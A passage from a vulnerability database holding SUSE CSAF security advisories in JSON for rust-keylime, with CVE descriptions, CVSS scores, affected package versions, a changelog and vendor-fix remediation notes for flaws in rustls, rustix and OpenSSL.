4.2, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:54Z", "details": "moderate" } ], "title": "CVE-2024-12224" }, { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:54Z", "details": "important" } ], "title": "CVE-2024-32650" }, { "cve": "CVE-2024-43806", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-43806" } ], "notes": [ { "category": "general", "text": "Rustix is a set of safe Rust bindings to POSIX-ish APIs. When using `rustix::fs::Dir` using the `linux_raw` backend, it\u0027s possible for the iterator to \"get stuck\" when an IO error is encountered. Combined with a memory over-allocation issue in `rustix::fs::Dir::read_more`, this can cause quick and unbounded memory explosion (gigabytes in a few seconds if used on a hot path) and eventually lead to an OOM crash of the application. The symptoms were initially discovered in https://github.com/imsnif/bandwhich/issues/284. That post has lots of details of our investigation. Full details can be read on the GHSA-c827-hfw6-qwvm repo advisory. If a program tries to access a directory with its file descriptor after the file has been unlinked (or any other action that leaves the `Dir` iterator in the stuck state), and the implementation does not break after seeing an error, it can cause a memory explosion. As an example, Linux\u0027s various virtual file systems (e.g. `/proc`, `/sys`) can contain directories that spontaneously pop in and out of existence. Attempting to iterate over them using `rustix::fs::Dir` directly or indirectly (e.g. with the `procfs` crate) can trigger this fault condition if the implementation decides to continue on errors. An attacker knowledgeable about the implementation details of a vulnerable target can therefore try to trigger this fault condition via any one or a combination of several available APIs. If successful, the application host will quickly run out of memory, after which the application will likely be terminated by an OOM killer, leading to denial of service. This issue has been addressed in release versions 0.35.15, 0.36.16, 0.37.25, and 0.38.19. Users are advised to upgrade. There are no known workarounds for this issue.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-43806", "url": "https://www.suse.com/security/cve/CVE-2024-43806" }, { "category": "external", "summary": "SUSE Bug 1229376 for CVE-2024-43806", "url": "https://bugzilla.suse.com/1229376" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 6.5, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:54Z", "details": "moderate" } ], "title": "CVE-2024-43806" }, { "cve": "CVE-2025-3416", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2025-3416" } ], "notes": [ { "category": "general", "text": "A flaw was found in OpenSSL\u0027s handling of the properties argument in certain functions. This vulnerability can allow use-after-free exploitation, which may result in undefined behavior or incorrect property parsing, leading to OpenSSL treating the input as an empty string.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2025-3416", "url": "https://www.suse.com/security/cve/CVE-2025-3416" }, { "category": "external", "summary": "SUSE Bug 1242599 for CVE-2025-3416", "url": "https://bugzilla.suse.com/1242599" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 3.7, "baseSeverity": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:54Z", "details": "low" } ], "title": "CVE-2025-3416" }, { "cve": "CVE-2025-58266", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2025-58266" } ], "notes": [ { "category": "general", "text": "unknown", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2025-58266", "url": "https://www.suse.com/security/cve/CVE-2025-58266" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:54Z", "details": "important" } ], "title": "CVE-2025-58266" } ] }
suse-su-2025:20057-1
Vulnerability from csaf_suse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Security update for rust-keylime", "title": "Title of the patch" }, { "category": "description", "text": "This update for rust-keylime fixes the following issues:\n\n- Update vendored crates (CVE-2024-43806, bsc#1229952, bsc#1230029)\n * rustix 0.37.25\n * rustix 0.38.34\n * shlex 1.3.0\n\n- Update to version 0.2.6+13:\n * Enable test functional/iak-idevid-persisted-and-protected\n * build(deps): bump uuid from 1.7.0 to 1.10.0\n * build(deps): bump openssl from 0.10.64 to 0.10.66\n * keylime-agent/src/revocation: Fix comment indentation\n * keylime/crypto: Fix indentation of documentation comment\n * build(deps): bump thiserror from 1.0.59 to 1.0.63\n * build(deps): bump serde_json from 1.0.116 to 1.0.120\n * dependabot: Extend to also monitor workflow actions\n * ci: Disable Packit CI on CentOS Stream 9\n * ci: use CODECOV_TOKEN when submitting coverage data\n * revocation: Use into() for unfallible transformation\n * secure_mount: Fix possible infinite loop\n * error: Rename enum variants to avoid clippy warning\n\n- Update to version 0.2.6~0:\n * Bump version to 0.2.6\n * build(deps): bump libc from 0.2.153 to 0.2.155\n * build(deps): bump serde from 1.0.196 to 1.0.203\n * rpm/fedora: Update rust macro usage\n * config: Support hostnames in registrar_ip option\n * added use of persisted IAK and IDevID and authorisation values\n * config changes\n * Adding /agent/info API to agent\n * Fix leftover \u0027unnecessary qualification\u0027 warnings on tests\n\n- Update to version 0.2.5~4:\n * Fix \u0027unnecessary qualification\u0027 warnings\n * fix IAK template to match IDevID\n * rpm: fix COPR RPMs build for centos-stream-10\n * Build COPR RPMs for centos-stream-10\n\n- Update to version 0.2.5~0:\n * Bump version to 0.2.5\n * cargo: Relax required version for pest crate\n * build(deps): bump log from 0.4.20 to 0.4.21\n * build(deps): bump thiserror from 1.0.56 to 1.0.59\n\n- actix-web update moves rustls as feature (bsc#1223234, CVE-2024-32650)\n\n- Update to version 0.2.4~39:\n * build(deps): bump openssl from 0.10.63 to 0.10.64\n * build(deps): bump h2 from 0.3.24 to 0.3.26\n * build(deps): bump serde_json from 1.0.107 to 1.0.116\n * build(deps): bump actix-web from 4.4.1 to 4.5.1\n * crypto: Enable TLS 1.3\n * build(deps): bump tempfile from 3.9.0 to 3.10.1\n * build(deps): bump mio from 0.8.4 to 0.8.11\n * enable hex values to be used for tpm_ownerpassword\n * config: Support IPv6 with or without brackets\n * keylime: Implement a simple IP parser to remove brackets\n * crypto: Implement CertificateBuilder to generate certificates\n * tests: Fix coverage download by supporting arbitrary URL\n * cargo: Add testing feature to keylime library\n * Set X509 SAN with local DNSname/IP/IPv6\n * Include newest Node20 versions for Github actions\n * tpm: Add unit test for uncovered public functions\n * crypto: Implement ECC key generation support\n * crypto: Add test for match_cert_to_template()\n * Fix minor typo, format and remove end whitespaces\n * crypto: Make error types less specific\n * tests/run.sh: Run tarpaulin with a single thread\n * payloads: Remove explicit drop of channel transmitter\n * crypto: Move to keylime library\n * crypto: Add specific type for every possible error\n * tpm: Rename origin of error as source in structures\n * list_parser: Add source for error for backtrace\n * algorithms: Make errors more specific\n * typo fix for default path to measured boot log file\n * README: remove mentions of libarchive as a dependency\n * Dockerfile.wolfi: Update clang to version 17\n * docker: Remove libarchive as a dependency\n * rpm: Remove libarchive from dependencies\n * cargo: Replace compress-tools with zip crate\n * cargo: Bump ahash to version 0.8.7\n * build(deps): bump serde from 1.0.195 to 1.0.196\n * build(deps): bump libc from 0.2.152 to 0.2.153\n * build(deps): bump reqwest from 0.11.23 to 0.11.24\n * docker: Install configuration file in the correct path\n * config: Make IAK/IDevID disabled by default\n\n- Update to version 0.2.4+git.1706692574.a744517:\n * Bump version to 0.2.4\n * build(deps): bump uuid from 1.4.1 to 1.7.0\n * keylime-agent.conf: Allow setting event logs paths\n * Mutable log paths: allow IMA and MBA log paths to be overridden by keylime configuration.\n * workflows: Update checkout action to version 4\n * build(deps): bump serde from 1.0.188 to 1.0.195\n * build(deps): bump pest_derive from 2.7.0 to 2.7.6\n * build(deps): bump openssl from 0.10.62 to 0.10.63\n * build(deps): bump config from 0.13.3 to 0.13.4\n * build(deps): bump base64 from 0.21.4 to 0.21.7\n * build(deps): bump tempfile from 3.8.0 to 3.9.0\n * build(deps): bump pest from 2.7.0 to 2.7.6\n * build(deps): bump actix-web from 4.4.0 to 4.4.1\n * build(deps): bump reqwest from 0.11.22 to 0.11.23\n * build(deps): bump h2 from 0.3.17 to 0.3.24\n * build(deps): bump shlex from 1.1.0 to 1.3.0\n * cargo: Bump tss-esapi to version 7.4.0\n * workflows: Fix keylime-bot token usage\n * tpm: Add error context for every possible error\n * tpm: Add AlgorithmError to TpmError\n * detect idevid template from certificates\n * build(deps): bump wiremock from 0.5.18 to 0.5.22\n * build(deps): bump thiserror from 1.0.48 to 1.0.56\n * Make use of workspace dependencies\n * build(deps): bump openssl from 0.10.57 to 0.10.62\n * packit: Bump Fedora version used for code coverage\n\n- Update to version 0.2.3+git.1701075380.a5dc985:\n * build(deps): bump actix-rt from 2.8.0 to 2.9.0\n * Bump version to 0.2.3\n * build(deps): bump reqwest from 0.11.20 to 0.11.22\n * Bump configuration version and fix enable_iak_idevid\n * Enable test functional/iak-idevid-register-with-certificates\n * Update packit plan with new tests\n * Add certificates and certificate checking for IDevID and IAK keys (#669)\n\n- Update to version 0.2.2+git.1697658634.9c7c6fa:\n * build(deps): bump rustix from 0.37.11 to 0.37.25\n * build(deps): bump tempfile from 3.6.0 to 3.8.0\n * build(deps): bump base64 from 0.21.0 to 0.21.4\n * build(deps): bump serde_json from 1.0.96 to 1.0.107\n * build(deps): bump openssl from 0.10.55 to 0.10.57\n * cargo: Bump serde to version 1.0.188\n * tests: Fix tarpaulin issues with dropped -v option\n * build(deps): bump signal-hook from 0.3.15 to 0.3.17\n * build(deps): bump actix-web from 4.3.1 to 4.4.0\n * build(deps): bump thiserror from 1.0.40 to 1.0.48\n * Remove private_in_public\n * Initial PR to add support for IDevID and IAK\n * build(deps): bump uuid from 1.3.1 to 1.4.1\n * build(deps): bump log from 0.4.17 to 0.4.20\n * build(deps): bump reqwest from 0.11.16 to 0.11.20\n * Do not use too specific version on cargo audit workflow\n * Add workflow to run cargo-audit security audit\n * README: update dependencies for Debian and Ubuntu\n * Use latest versions of checkout/upload-artifacts\n * docker: Add \u0027keylime\u0027 system user\n * Use \"currently\" for swtpm emulator warning (#632)\n * Update container workflow actions versions\n * Build container image and push to quay.io\n * README: update requirements\n\n- Update to version 0.2.2+git.1689256829.3d2b627:\n * Bump version to 0.2.2\n * build(deps): bump tempfile from 3.5.0 to 3.6.0\n * removing SIGINT stop signals from Dockerfiles and systemd service, as well as adding SIGTERM to IMA emulator as shutdown signal\n\n- Update to version 0.2.1+git.1689167094.67ce0cf:\n * cargo: Bump serde to version 1.0.166\n * build(deps): bump libc from 0.2.142 to 0.2.147\n * adding release Dockerfiles in 3 flavours: fedora, distroless and wolfi\n * hash: add more configurable hash algorithm for public key digest\n * cargo: Update clap to version 4.3.11\n * cargo: Bump tokio crate version to 1.28.2\n * Add an example of IMA policy\n * main: Gracefully shutdown on SIGTERM or SIGINT\n * cargo: Bump proc-macro2 crate version\n * revocation: Parse revocation actions flexibly\n * crypto: Add unit tests for x509 functions\n * crypto: Make internal functions private\n * config: Add unit test for the list to files mapping\n * config: Make trusted_client_ca to accept lists\n * lib: Implement parser for lists from config file\n * build(deps): bump openssl from 0.10.48 to 0.10.55\n * Add secure mount sanity test to packit testing.\n * [packit] Do not let COPR project expire\n\n- Recommends the IMA Policy subpackage only if SELinux is configured\n\n- Update to version 0.2.1+git.1685699835.3c9d17c:\n * Remove MOUNT_SECURE bool\n * rpm: Remove unused directory and add dependency for mount\n * keylime-agent/src: update API version to 2.1 to consistent with https://github.com/keylime/keylime/blob/master/docs/rest_apis.rst\n * docker/fedora/keylime_rust.Dockerfile: add the logic of cloning and compiling rust-keylime\n * [tests] Update test coverage task name regexp\n * [tests] Simply coverage file URL parsing\n\n", "title": "Description of the patch" }, { "category": "details", "text": "SUSE-SLE-Micro-6.0-65", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_20057-1.json" }, { "category": "self", "summary": "URL for SUSE-SU-2025:20057-1", "url": "https://www.suse.com/support/update/announcement/2025/suse-su-202520057-1/" }, { "category": "self", "summary": "E-Mail link for SUSE-SU-2025:20057-1", "url": "https://lists.suse.com/pipermail/sle-security-updates/2025-June/021276.html" }, { "category": "self", "summary": "SUSE Bug 1223234", "url": "https://bugzilla.suse.com/1223234" }, { "category": "self", "summary": "SUSE Bug 1229952", "url": "https://bugzilla.suse.com/1229952" }, { "category": "self", "summary": "SUSE Bug 1230029", "url": "https://bugzilla.suse.com/1230029" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-43806 page", "url": "https://www.suse.com/security/cve/CVE-2024-43806/" } ], "title": "Security update for rust-keylime", "tracking": { "current_release_date": "2025-02-03T08:57:24Z", "generator": { "date": "2025-02-03T08:57:24Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "SUSE-SU-2025:20057-1", "initial_release_date": "2025-02-03T08:57:24Z", "revision_history": [ { "date": "2025-02-03T08:57:24Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "rust-keylime-0.2.6+13-1.1.aarch64", "product": { "name": "rust-keylime-0.2.6+13-1.1.aarch64", "product_id": "rust-keylime-0.2.6+13-1.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "rust-keylime-0.2.6+13-1.1.s390x", "product": { "name": "rust-keylime-0.2.6+13-1.1.s390x", "product_id": "rust-keylime-0.2.6+13-1.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "rust-keylime-0.2.6+13-1.1.x86_64", "product": { "name": "rust-keylime-0.2.6+13-1.1.x86_64", "product_id": "rust-keylime-0.2.6+13-1.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "SUSE Linux Micro 6.0", "product": { "name": "SUSE Linux Micro 6.0", "product_id": "SUSE Linux Micro 6.0", "product_identification_helper": { "cpe": "cpe:/o:suse:sl-micro:6.0" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.6+13-1.1.aarch64 as component of SUSE Linux Micro 6.0", "product_id": "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.aarch64" }, "product_reference": "rust-keylime-0.2.6+13-1.1.aarch64", "relates_to_product_reference": "SUSE Linux Micro 6.0" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.6+13-1.1.s390x as component of SUSE Linux Micro 6.0", "product_id": "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.s390x" }, "product_reference": "rust-keylime-0.2.6+13-1.1.s390x", "relates_to_product_reference": "SUSE Linux Micro 6.0" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.6+13-1.1.x86_64 as component of SUSE Linux Micro 6.0", "product_id": "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.x86_64" }, "product_reference": "rust-keylime-0.2.6+13-1.1.x86_64", "relates_to_product_reference": "SUSE Linux Micro 6.0" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.aarch64", "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.s390x", "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.aarch64", "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.s390x", "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.aarch64", "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.s390x", "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-02-03T08:57:24Z", "details": "important" } ], "title": "CVE-2024-32650" }, { "cve": "CVE-2024-43806", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-43806" } ], "notes": [ { "category": "general", "text": "Rustix is a set of safe Rust bindings to POSIX-ish APIs. When using `rustix::fs::Dir` using the `linux_raw` backend, it\u0027s possible for the iterator to \"get stuck\" when an IO error is encountered. Combined with a memory over-allocation issue in `rustix::fs::Dir::read_more`, this can cause quick and unbounded memory explosion (gigabytes in a few seconds if used on a hot path) and eventually lead to an OOM crash of the application. The symptoms were initially discovered in https://github.com/imsnif/bandwhich/issues/284. That post has lots of details of our investigation. Full details can be read on the GHSA-c827-hfw6-qwvm repo advisory. If a program tries to access a directory with its file descriptor after the file has been unlinked (or any other action that leaves the `Dir` iterator in the stuck state), and the implementation does not break after seeing an error, it can cause a memory explosion. As an example, Linux\u0027s various virtual file systems (e.g. `/proc`, `/sys`) can contain directories that spontaneously pop in and out of existence. Attempting to iterate over them using `rustix::fs::Dir` directly or indirectly (e.g. with the `procfs` crate) can trigger this fault condition if the implementation decides to continue on errors. An attacker knowledgeable about the implementation details of a vulnerable target can therefore try to trigger this fault condition via any one or a combination of several available APIs. If successful, the application host will quickly run out of memory, after which the application will likely be terminated by an OOM killer, leading to denial of service. This issue has been addressed in release versions 0.35.15, 0.36.16, 0.37.25, and 0.38.19. Users are advised to upgrade. There are no known workarounds for this issue.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.aarch64", "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.s390x", "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-43806", "url": "https://www.suse.com/security/cve/CVE-2024-43806" }, { "category": "external", "summary": "SUSE Bug 1229376 for CVE-2024-43806", "url": "https://bugzilla.suse.com/1229376" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.aarch64", "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.s390x", "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 6.5, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.aarch64", "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.s390x", "SUSE Linux Micro 6.0:rust-keylime-0.2.6+13-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-02-03T08:57:24Z", "details": "moderate" } ], "title": "CVE-2024-43806" } ] }
gsd-2024-32650
Vulnerability from gsd
{ "gsd": { "metadata": { "exploitCode": "unknown", "remediation": "unknown", "reportConfidence": "confirmed", "type": "vulnerability" }, "osvSchema": { "aliases": [ "CVE-2024-32650" ], "details": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "id": "GSD-2024-32650", "modified": "2024-04-17T05:01:56.864999Z", "schema_version": "1.4.0" } }, "namespaces": { "cve.org": { "CVE_data_meta": { "ASSIGNER": "security-advisories@github.com", "ID": "CVE-2024-32650", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "rustls", "version": { "version_data": [ { "version_affected": "=", "version_value": "\u003e= 0.23.0, \u003c 0.23.5" }, { "version_affected": "=", "version_value": "\u003e= 0.22.0, \u003c 0.22.4" }, { "version_affected": "=", "version_value": "\u003e= 0.21.0, \u003c 0.21.11" }, { "version_affected": "=", "version_value": "= 0.20.0" } ] } } ] }, "vendor_name": "rustls" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11." } ] }, "impact": { "cvss": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "cweId": "CWE-835", "lang": "eng", "value": "CWE-835: Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)" } ] } ] }, "references": { "reference_data": [ { "name": 